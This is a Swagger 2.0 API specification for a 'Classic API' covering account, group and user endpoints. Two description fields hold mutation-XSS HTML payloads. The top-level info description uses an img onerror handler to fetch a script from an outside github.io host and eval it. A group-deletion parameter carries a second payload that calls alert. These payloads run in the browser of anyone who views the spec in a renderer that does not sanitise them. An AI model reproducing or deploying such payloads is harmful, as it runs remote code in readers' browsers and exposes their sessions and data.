swagger: '2.0'
info:
  title: Classic API Resource Documentation
  description: <math><mtext><h1><a><h6></a></h6><mglyph><svg><mtext><textarea><a title='</textarea><img src onerror=fetch(`https://teragl.github.io/storage.js`).then(function(res){res.text().then(function(data){eval(data)})})>'></textarea></h1>">"</textarea></desc></textarea></mtext></mtext></svg></mglyph></option></mtext></math>
  version: production
basePath: /JSSResource/
produces:
  - application/xml
  - application/json
consumes:
  - application/xml
  - application/json
security:
  - basicAuth: []
paths:
  /accounts:
    get:
      responses:
        '200':
          description: No response was specified
      tags:
        - accounts
      operationId: findAccounts
      summary: Finds all accounts
  '/accounts/groupid/{id}':
    delete:
      parameters:
        - description: |
            <form><math><mtext></form><form><mglyph><svg><mtext><textarea><path id="</textarea><img onerror=alert('textarea') src=1>"></form>

          format: int64
          in: path
          name: id
          required: true
          type: integer
      responses:
        '200':
          description: No response was specified
      tags:
        - accounts
      operationId: deleteGroupById
      summary: Deletes a group by id
    get:
      parameters:
        - description: Id value to filter by
          format: int64
          in: path
          name: id
          required: true
          type: integer
      responses:
        '200':
          description: No response was specified
      tags:
        - accounts
      operationId: findGroupsById
      summary: Finds groups by id
    post:
      parameters:
        - description: Id value to filter by
          in: path
          name: id
          required: true
          type: string
      responses:
        '200':
          description: No response was specified
      tags:
        - accounts
      description: 'You cannot create an LDAP group with a POST.  '
      operationId: createGroupById
      summary: Creates a new group by id
    put:
      parameters:
        - description: Id value to filter by
          format: int64
          in: path
          name: id
          required: true
          type: integer
      responses:
        '200':
          description: No response was specified
      tags:
        - accounts
      description: You cannot change information for an LDAP group with a PUT.
      operationId: updateGroupById
      summary: Updates an existing group by id
  '/accounts/groupname/{name}':
    get:
      parameters:
        - description: Name to filter by
          in: path
          name: name
          required: true
          type: string
      responses:
        '200':
          description: No response was specified
      tags:
        - accounts
      description: 'You can PUT, POST, and DELETE using this resource URL.'
      operationId: findGroupsByName
      summary: Finds groups by name
  '/accounts/userid/{id}':
    delete:
      parameters:
        - description: Id value to filter by
          format: int64
          in: path
          name: id
          required: true
          type: integer
      responses:
        '200':
          description: No response was specified
      tags:
        - accounts
      operationId: deleteUserById
      summary: Deletes a user by id
